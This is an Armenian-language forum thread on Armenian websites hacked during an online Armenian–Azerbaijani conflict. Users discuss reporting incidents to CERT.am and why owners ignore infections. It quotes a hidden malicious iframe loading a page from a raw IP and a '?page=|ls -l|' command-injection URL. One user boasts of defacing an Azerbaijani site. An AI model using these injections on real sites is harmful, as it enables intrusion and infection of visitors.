Նենգորդների զոհ դարձած հայկական կայքեր

[Սահակ]

http://cert.am/
http://cert.am/report_incident.html

Շնորհակալություն։ Ես չէի իմանում սրա մասին։ Կուղարկեմ բոլոր ջարդած կայքերը իրենց։ Եթե այսպսի բան կա, երևի կարելի է այս թեման փակել։

[NetX]

Շնորհակալություն։ Ես չէի իմանում սրա մասին։ Կուղարկեմ բոլոր ջարդած կայքերը իրենց։ Եթե այսպսի բան կա, երևի կարելի է այս թեման փակել։

Խնդրեմ, միգուցե Ձեր միջոցով այնտեղ ակտիվացում մցնելուց հետո կարող ա վերջապես cert.am-ը իր իրական նաշանակությամբ ծառայել այլ ոչ թե լինել ուղղակի լինելու համար

ՀԳ թեման որոշ ժաման անց կփակվի

[Cannibal]

Cannibal, անտիհակերներ ունենալուց կուրախանամ, հակերներ ունենալուց՝ հակառակը: Կիբերպատերազմն էլ սկվի, տխուր դեմքով կասեմ «գնացին հավասարվեցին իրանց մարդկային մակարդակին»

մարդիկ տարբեր մտածելակերպ ունեն.իսկ հավասարվելու հետ ետքան ել համաձայն չեմ.պրոստո իրանց պետք ա ցույց տրվի որ մենք ել կարանք ու եթե պետք լինի կանենք բայց Չենք անում.այ եթե մենք սկսեինք եդ ուրիշ բան

Գիտելիքը կաևոր է, բայց նաև կարևոր թ թե ինչ աղբյուրից ես այն ստանում Իսկ եթե լավ մտածես, միգուցե դրանք ընդամենը ինքնահաստատման փորձեր են

աղբյուրը ավելի լավ ա որ ոչ միայն գրքերից ստանաս այլ նաև ինքնուրույն պրակտիկա ունենաս.ամեն ինչ չի որ գրքով պիտի սովորես. ես չեմ ուզում ինքնահաստատվեմ.ես ինքս հակերների թմի մեջ կամ ու իմ իսկական ածականը ոչ մեկը չգիտի.ետ թմով դեռ մի հատ ազեռական սայթ ա ջարդվել պրոստո հիմա անդամները շաատ զբաղված են դրա համար չենք սկսում.իմ իսկական ածականը ոչ մեկտ չգիտեք.իսկ Կաննիբալ ածականս ես չեմ ուզում հաստատեմ որպես "հայտնի" լամեռ քանի որ ես ածականը ինձ արդեն հարազատ ա

[Elmo]

Նախ ասեմ , որ կայքերի վիրուսով վարաքվելը իրենից ներկայացնում է 90% - ով կայքի index կամ այլ կարևոր ֆայլերի օրինակ login.php մեջ ինչ-որ ,HTML , JavaScript կամ այլ կոդի ներդնում օրինակ`

Կոդ:

<iframe src='http://216.227.223.57/pe.php' width='1' height='1' style='visibility:hidden;'></iframe>

, որը աշխատում է այդ էջը կանչելիս , ու ըստ քեզ ոնց կարելի է դա անել եթե նենգորդը չունենա ftp դոստուպ , իսկ ftp դոստուպ ունենալ նշանակումե հոստինգի 21port- ի հետ խաղեր անել կամ user-ի login password-ը ունենալ , որոնցից առաջինը ավելի հեշտ է սխալ ու ոչ պրոֆեսիոնալ նաստռոյկա արաց serveri os-ի վրա անել քան 2-րդը , որովհետև նույնիսք vBulletin - ի նման պռոֆ գրված ֆորումը մի 12 տառանոց login password- ով հանգիստ ջարդումեն նենգորդները ու գրում իրենց կոդերը ֆայլերի մեջ

Ավելի շատ հոստինգի վրայի ծակ սայթով են մտնում ՕՀ-ը վարակում, քան ՕՀ-ի ծակով՝ կայքերը:

[Tom]

օրինակ երբ PHP/CGI սկրիպտին փոխանցում ես պարամետր, որը ինքը ֆիլտրացիա չի անում ու կատարում ա, օրինակ՝
շատ պարզ օրինակ
www.aaaaaaaa.am/?page=contacts.htm

www.aaaaaaaa.am/?page=index.php
կարելի է տեսնել index.php source-ը

Դժվար , իմ կարծիքով սենց չես կարա իմ ասած ձևով ինչ որ վիրուս կանչող կոդ ավելացնես կայքի էջերի source - մեջ դրա համար վսյոտկի ftp- է պետք :

կամ հնարավոր լինի կատարել հրաման սերվերի վրա
www.aaaaaaaa.am/?page=|ls%20-l|

Իսկ էս դեպքի հավանական լինելու համար նախ պետքա որ էտ կայքի տերը հոստինգ տվողը լինի , որովհետև մյուսները բոլորնել user-ի կարգավիճակով են ու շատ քիչ հրամանների իրավունք ունեն իրենց կոդում օգտագործելու , համել cgi կամ php նախագծերից շատ քչերն են ըտենց բան օգտագործում կոդի մեջ դրանքել հիմնականում շատ պռոֆ ծրագրերն են որոնք հաստատ GET-ով եկած փոփխականին հազար տեսակի ֆիլտրեր են անում :
Իմ կարծիքով կարելի է խակերներին հարցնել եթե ցանկություն ունեն էստեղ մի քիչ կիսֆեն իրենց հնարքներով կապված կոդերում ինչ-որ բան ավելավնելու հետ :

[Elmo]

օրինակ երբ PHP/CGI սկրիպտին փոխանցում ես պարամետր, որը ինքը ֆիլտրացիա չի անում ու կատարում ա|

ուհու

[Xelgen]

Cannibal> И имя их было Леги.. в смысле Liazor team Մնացածի առումով համաձայն եմ Chuk-ի գրածների հետ, կամ էլ թե հակ ես անում, լուրջ ռեսուրս պետք է հակ անես, ու լուրջ հակես։ Կարո՞ղ ես օրինակ Ալիևի և Մելի Մեջլիսի կայքը աննկատ ջարդես ու օֆֆիցիալ հրապարակումների մեջ ավելացնես որ ճանաչում ես ԼՂՀ անկախությունը, հետո էլ վերցնես օպոզիցիոն ռեսուրսի վրա նշես թե ժողովորդ ոտքի ելեք, հողերը հանձնին, զինված պայքար իշխանություններին, բայկոտ-մայկոտ արեք։ Կարճ ասած լուրջ մտածբած տեղեկատվական ջարդ պետք է լինի, ինչ որ խեղճ ու կրակ ֆորումներ/հոմփեյջեր ջարդելը անիմաստ, անվայել ու կոնրտպրոդուկտիվ է։

Tom> Network.am-y արդեն պատասխանեց, լոգ-երը հետազոտելով և տեսնելով, որ առանձ բրուտֆորցի, ինչ-որ փախած երկրի ԻՊ-ից ֆտպ-ով միանում էին, հետո էլ կազմակերպության «ադմինին» ես գրում, պարզվում է որ օրինակ անտիվիրուսները մի մեկուկես տարի չեն թարմացվում, որորվհետև «անիմաստ է դրա վրա ժամանակ կրոցնել, ինքը ՕՀի իմիջի ունի, երբ վիրուսները շատանում են, ինքը վերցնում նորից համակարգը քցում է ետ իմիջից» կամ էլ ինքդ ես գնում նրանց մոտ, ու անզեն աչքով տեսնում ես մի մեծ գազանանոց ամեն մի կոմպի վրա։
Բացի դրանից կան շատ տարբերակներ հենց կայքի սկրիպտերի սխալների միջոցով փոփոխություննր անել, գուգլիր օրինակ «MySQL injection»։

Network.am, Սահակ> Հենց դրա մասին էի գրում, որ մեր CERT-ը մեռած է՝ չի գործում։ Ես նրանց ես ամառ մերա հեք-ռեպօռտ ուղղարկելով, կասկածում եմ որ մեկը տեսել է, էլ չեմ ասում արձագանքելու մասին։ Ինչքան ինձ է հասել «երեխեքին են փոխանցել» երեխեքն էլ խաղացին մի քիչ երևի ու ձանձրացան

Այստեղ պետք է մի անգամ էլ բերեմ վրացական ՑԵՌՏ-ի օրինակը։ Երբ որ պատերազմի ժամանակ Թիֆլիսից էին պետ. գործիչները փախնում, վրացական ՑԵՌՏին օգնության էին եկել-հասել Էստոնական ու (կարծեմ) Լեհական ՑԵՌՏ-ի մասանգետները։ Ետ նենց, որ լրջությունը զգացվի։

Առաջարկություններից՝ նախ հասկանալ թե ինչումն է խնդիրը մեր ՑԵՌՏի հետ, ու փորձել այն ուշքի բերել։
Ստեղծել կամավոր-էնտուզիաստ IT Sec մասնագետնորի խումբ, որոնք պարբերաբար անցկացնելու են կարևոր կայքերի աուդիտ և խնդիրների դեպքում տեղեկացնելու են կայքի/հոսթինգի/ՑՄՍ-ի պատասխանատուներին։ Թե էլ ինչ կարող է անել այդ խումբը կախված է նրանցի թե ինչքան ռեսուրց կունենանք, առնվազն արժի նաև ինչ-որ «ռեկոմենդացիաներ» հրապարակել։ Չնայած եթե ՑԵՌՏ-ը աշխատի դա նրանց գործը կլինի արդեն։

Մեկ այլ խնդիր՝ ՏՏ անվտանգությանը շատ քչերն են լուրջ վերաբերվում, երևի քանի դեռ նրանց գրպանին դա չխփի, վերաբերմունքը նույնն է մնալու։

Chuk> Նույնիս եթե որպես ամոթանք սրան վերաբերվենք (անձամբ ես որպես ամոթանք չեմ վերաբերվում ու եթե իմ պատասխանատվության տակ գտվող կայքը ստեղ կտեղադրվի ու ստեղից դրանից կտեղեկանամ, միայն շնորհակալ կլինեմ) քո կարծիքով այդ ամոթանքը որևէ մեկին հուզո՞ւմ է։ ԱՄՆ-ում հայկական դեպսանության կայքը 5-6 (!!!) ամիս վարաքված է եղել, այսցելուններին վարաքում էր, գուգլը կայքի կոզքին գրում էր որ «այս կայքը կվնասի ձեր համակարգիչը» իսկ երբ նրանց (և կարծեմ նույնից ԱԳՆ) դրա մասին գրելուց ոչ մի արձագանք չեղավ և վերջը ԶԼՄ-ներին դրա մասին տեղեկացրին ու դրանից հետո միայն կայքից տրոյանը հանեցին, ԱՄՆում դեսպանատունը դեռ երես ունեցաց ասել թե սուտ է, տենց բան չի եղել։
Նայի վերը գրվածը նրա մասին, որ անվտանգությանը լուրջ չեն վերաբերվում։

[Cannibal]

Cannibal> И имя их было Леги.. в смысле Liazor team Մնացածի առումով համաձայն եմ Chuk-ի գրածների հետ, կամ էլ թե հակ ես անում, լուրջ ռեսուրս պետք է հակ անես, ու լուրջ հակես։ Կարո՞ղ ես օրինակ Ալիևի և Մելի Մեջլիսի կայքը աննկատ ջարդես ու օֆֆիցիալ հրապարակումների մեջ ավելացնես որ ճանաչում ես ԼՂՀ անկախությունը, հետո էլ վերցնես օպոզիցիոն ռեսուրսի վրա նշես թե ժողովորդ ոտքի ելեք, հողերը հանձնին, զինված պայքար իշխանություններին, բայկոտ-մայկոտ արեք։ Կարճ ասած լուրջ մտածբած տեղեկատվական ջարդ պետք է լինի, ինչ որ խեղճ ու կրակ ֆորումներ/հոմփեյջեր ջարդելը անիմաստ, անվայել ու կոնրտպրոդուկտիվ է։

սրա համար բավականին երկար ժամանակ ինձ կարան նստացնեն.ես արդեն շատ լուրջ քայլ կլինի.հետն ել ես իսկական հակեր չեմ որ ցանկացած սայթ կարանամ ջարդեմ.հավես ել չկա խորանամ սեռվեռնի եքսպլոիտների մեջ

[Xelgen]

Cannibal> Դա պարզապես լուրջ հարձակման օրինակ էր, և ոչ մի դեպքում մտախաղացում կամ որևէ մեկին հակաօրինական քայլերի դրդում։

Բայց իմիջայլոց քո հիշված Լիազոր թիմը նման մի բան էր արել, կարծեմ դեյ.ազ-ում տեղադրել էին նորություն թե իբր ԼՂՀ անկախությունը ճանաչվել է, և նախագահի լրատվական ծառայությունը ստիպված էր դա պաշտոնապես հերքել։

Իսկ նստացնելը լավ ասեցիր՝ Ադրբեջանը մի շարք փաստաթխթեր է ստորագրել ՏՏ անվտանգության ապահովության մասին, մեր կողմը լավ կաներ ամեն մի ջարդված կայք միջազգային մակարդակի վրա Ադրբեջանի քթից բերեր, պահանջեր քրեկան ապատասխանատվության կանչել ազերական հաքերներին, բերեր դա որպես ադրբեջանակնա հասարակության թշնամանքի և պետական հակահայկական պրոպագանդայի ապացույցներ և այլն։
Բայց դե դա երազանքներ են.. մեր կառույցները շատ ավելի լուրջ հարցերում ոչ մի բան չեն ձեռնարկում…

[Chuk]

Chuk> Նույնիս եթե որպես ամոթանք սրան վերաբերվենք (անձամբ ես որպես ամոթանք չեմ վերաբերվում ու եթե իմ պատասխանատվության տակ գտվող կայքը ստեղ կտեղադրվի ու ստեղից դրանից կտեղեկանամ, միայն շնորհակալ կլինեմ) քո կարծիքով այդ ամոթանքը որևէ մեկին հուզո՞ւմ է։ ԱՄՆ-ում հայկական դեպսանության կայքը 5-6 (!!!) ամիս վարաքված է եղել, այսցելուններին վարաքում էր, գուգլը կայքի կոզքին գրում էր որ «այս կայքը կվնասի ձեր համակարգիչը» իսկ երբ նրանց (և կարծեմ նույնից ԱԳՆ) դրա մասին գրելուց ոչ մի արձագանք չեղավ և վերջը ԶԼՄ-ներին դրա մասին տեղեկացրին ու դրանից հետո միայն կայքից տրոյանը հանեցին, ԱՄՆում դեսպանատունը դեռ երես ունեցաց ասել թե սուտ է, տենց բան չի եղել։
Նայի վերը գրվածը նրա մասին, որ անվտանգությանը լուրջ չեն վերաբերվում։

Լրիվ համաձայն եմ: Ուշադրություն դարձրու որ ինքս «ամոթանքի հարթակ» բառերը գրել էի չակերտների մեջ: Իմ կայքերից էլ է եղել, որ հեք են արվել ու ի տարբերություն շատերի ես այդտեղ ամոթալի բան չեմ տեսել: Ընդամենը նոր գիտելիքներ եմ ստացել, շտկել, փակել ծակերը:

Բայց այստեղ երկու ուրիշ հարց կա.
- Շատերն այլ կերպ են ընկալում այդ փաստը: Որպես օրինաը կբերեմ Cannibal-ին, այս թեմայում և երեկ մի այլ թեմայում իրա գրածները: Մասնավորապես ինքը երեկ թեմա էր բացել, որտեղ գրվել էր, որ կոտրված կայքի պատճառով «խայտառակ ենք լինում», այս թեմայում տեսնելով կոտրված կայքերի հասցեները «ամոթից» ու «խայտառակությունից փրկվելու» համար հակաքայլերի են սկսում գնալ և այլն
- Ամբողջ խնդիրն էն ա, որ ես գոնե մեկ դեպք չգիտեմ, որ այս թեմայում տեղադրված կայքի տերն այս թեմայի միջոցով իմացած լինի իր կայքի «վարակված լինելու» մասին ու շտկի այն: Այսինքն թեմայի ՕԳԳ-ն այդ իմաստով, ցավոք, ձգտում է զրոյի:

[Cannibal]

սկզբում ես գիտեի թե մենակ ռեալն են ջարդել ու իմ լսելով բավականին մարդ ա այցելում ետ կայքը ու դաժե ջարդելուց հետո ես չեի կարա վերաջարդեի որ առաջին էջին բան ման գրեի… իրա ադմինին ել նամակ եմ ուղարկել,որում տեղեկացնում եի դրա մասին ,բայց դե հնարավոր ա արդեն տեղյակ էր
իսկ ես թեմայում տեսա որ ազեները չափը անցան…հետն ել էլի եմ կրկնում ամեն առանձին դեպքում սայթ ջարդելը իրա հետաքրքրությունները ու դժվարությունները ունի…ետի լիքըը գիտելիք ա տալիս
ես խոսացել եմ հակերական երկու թմերի հետ ու մենք որոշել ենք ոչինչին չխառնվել.ինչքան անկապ հայկական սայթ կա թող ջարդեն.ինչքան քիչ ենքան ամուր..

- Ամբողջ խնդիրն էն ա, որ ես գոնե մեկ դեպք չգիտեմ, որ այս թեմայում տեղադրված կայքի տերն այս թեմայի միջոցով իմացած լինի իր կայքի «վարակված լինելու» մասին ու շտկի այն: Այսինքն թեմայի ՕԳԳ-ն այդ իմաստով, ցավոք, ձգտում է զրոյի:

դե թեման փակի …Դ ես ել նման բան չտեսա բայց ուրիշները տեղեկացան վիրուսոտ սայթերի մասին ու հիմա ավելի զգույշ կլինեն.

իմ կարծիքով թեման արդեն քամվավ պրծավ.

[Egern.net]

Էսօր day.az-ն էր մի լավ ցանկ հրապարակել, բայց ինչքան հասկացա, ոչ բոլորն են ճիշտ: Քանի որ սայթ կար, որի դոմենի ժամկետը անցել էր, ու դժվար թե էդ վիճակում քանդվեր ...
day.az/news/hitech/140310.html

[Արամ]

Էսօր day.az-ն էր մի լավ ցանկ հրապարակել, բայց ինչքան հասկացա, ոչ բոլորն են ճիշտ: Քանի որ սայթ կար, որի դոմենի ժամկետը անցել էր, ու դժվար թե էդ վիճակում քանդվեր ...
day.az/news/hitech/140310.html

դուրսա գալիս ես ադրբեջանցիք ինձնից շատ հայկական սայտեր գիտեն, կյանքիս մեջ եսքան հայկական սայթ չէի տեսել

[Սահակ]

դուրսա գալիս ես ադրբեջանցիք ինձնից շատ հայկական սայտեր գիտեն, կյանքիս մեջ եսքան հայկական սայթ չէի տեսել

Ստեղ հազարից ավել հայատառ, հայալեզու, հայկական սայտ կա։ http://www.dmoz.org/World/Armenian/

[Սահակ]

Իսկ նստացնելը լավ ասեցիր՝ Ադրբեջանը մի շարք փաստաթխթեր է ստորագրել ՏՏ անվտանգության ապահովության մասին, մեր կողմը լավ կաներ ամեն մի ջարդված կայք միջազգային մակարդակի վրա Ադրբեջանի քթից բերեր, պահանջեր քրեկան ապատասխանատվության կանչել ազերական հաքերներին, բերեր դա որպես ադրբեջանակնա հասարակության թշնամանքի և պետական հակահայկական պրոպագանդայի ապացույցներ և այլն։
Բայց դե դա երազանքներ են.. մեր կառույցները շատ ավելի լուրջ հարցերում ոչ մի բան չեն ձեռնարկում…

«Միջազգային մակարդակի վրա» պահանջելը անիմաստա։ Օրինակ Եվրոպայում ու Ռուսաստանում լիքը հաքերներ կան հայտնի, որոնք մի շարք կարևոր սայտեր էն ջարդել ԱՄՆ-ում, և միլլիոնավոր դոլլարների վնաս բերել, բայց ԱՄՆ-ն չի կարող այդ մարդկանց ձեռբակալել քանի որ յուրիսդիկցիա չունի ԱՄՆ-ից դուրս։ 2001 թվականին ՖԲԻ-ը ստեղծեծ կեղծ ընկերություն «Ինվիտա» անունով, և այդ ընկերության կողմից աշխատանքի հրավիրեց երկու շատ հայտնի ռուս հաքերների։ Հենց իրանք ոտը դրեցին ԱՄՆ-ի տարածքի վրա, միանգամից ձերբակալվեցին։ Նույն բանը փորձեցին անել հայտնի Գերմանական հաքերի հետ, բայց չստացվեց։ Ավելի մանրամասն դրա մասին կարող ես կարդալ այստեղ՝ http://blog.wired.com/27bstroke6/200...tricked-h.html